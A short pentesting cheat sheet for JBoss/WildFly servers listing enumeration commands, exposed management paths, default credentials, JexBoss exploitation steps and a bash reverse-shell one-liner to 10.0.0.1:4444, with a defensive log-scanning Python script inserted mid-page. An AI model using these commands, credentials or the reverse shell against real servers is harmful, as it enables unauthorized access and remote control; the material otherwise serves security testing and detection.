JBOSS Pentesting

JBoss AS (Application Server), also known as WildFly, is an application server written in Java.

Enumeration

msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan


Common Directories

/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp
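
On the defensive side, requests to the paths listed above are worth alerting on. The following is an added example, not code from the original page or from any tool it mentions: it scans access-log lines for those endpoints and reports, per client, which ones answered 200 with no authenticated user. It assumes the common/combined access-log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Path prefixes condensed from the "Common Directories" list on this page.
JBOSS_PATHS = ("/admin-console", "/invoker/JMXInvokerServlet", "/jbossws",
               "/jmx-console", "/management", "/manager", "/status",
               "/web-console")
# Assumed format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3}) ')

SAMPLE_LOG = [  # constructed lines using documentation-range addresses
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /%77eb-console/ServerInfo.jsp HTTP/1.1" 401 0',
    '203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "POST //invoker/JMXInvokerServlet HTTP/1.1" 200 312',
    '198.51.100.4 - ops [10/Mar/2024:10:05:00 +0000] "GET /status?full=true HTTP/1.1" 200 900',
    '198.51.100.9 - - [10/Mar/2024:10:06:00 +0000] "GET /shop/manager-picks HTTP/1.1" 200 100',
]

def matched_endpoint(target):
    """Return the listed prefix that a request target falls under, or None."""
    # Drop the query string, decode %xx, collapse //, /./ and /../ so that
    # obfuscated variants compare equal; case is folded because probes vary it.
    path = unquote(target.split("?", 1)[0])
    path = normpath("/" + path.lstrip("/")).lower()
    for prefix in JBOSS_PATHS:
        p = prefix.lower()
        if path == p or path.startswith(p + "/"):  # whole path segments only
            return prefix
    return None

def summarize(lines):
    """Per client IP: endpoints requested, and those served 200 unauthenticated."""
    report = defaultdict(lambda: {"endpoints": set(), "exposed": set()})
    for line in lines:
        m = LOG_RE.match(line)
        hit = matched_endpoint(m.group(3)) if m else None
        if hit is None:
            continue  # unparsable line or unrelated path
        ip, user, status = m.group(1), m.group(2), m.group(4)
        report[ip]["endpoints"].add(hit)
        if status == "200" and user == "-":
            report[ip]["exposed"].add(hit)  # no HTTP-auth user was logged
    return dict(report)

if __name__ == "__main__":
    for ip, r in summarize(SAMPLE_LOG).items():
        print(ip, sorted(r["endpoints"]), "unauthenticated 200:", sorted(r["exposed"]))
```

Any entry under "unauthenticated 200" means a management endpoint is reachable without HTTP authentication and should be restricted or removed from the deployment.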


Default Credentials

admin:admin


Exploitation

JexBoss is available as an exploitation CLI tool.

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.
python3 jexboss.py -host https://example.com:8080

# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1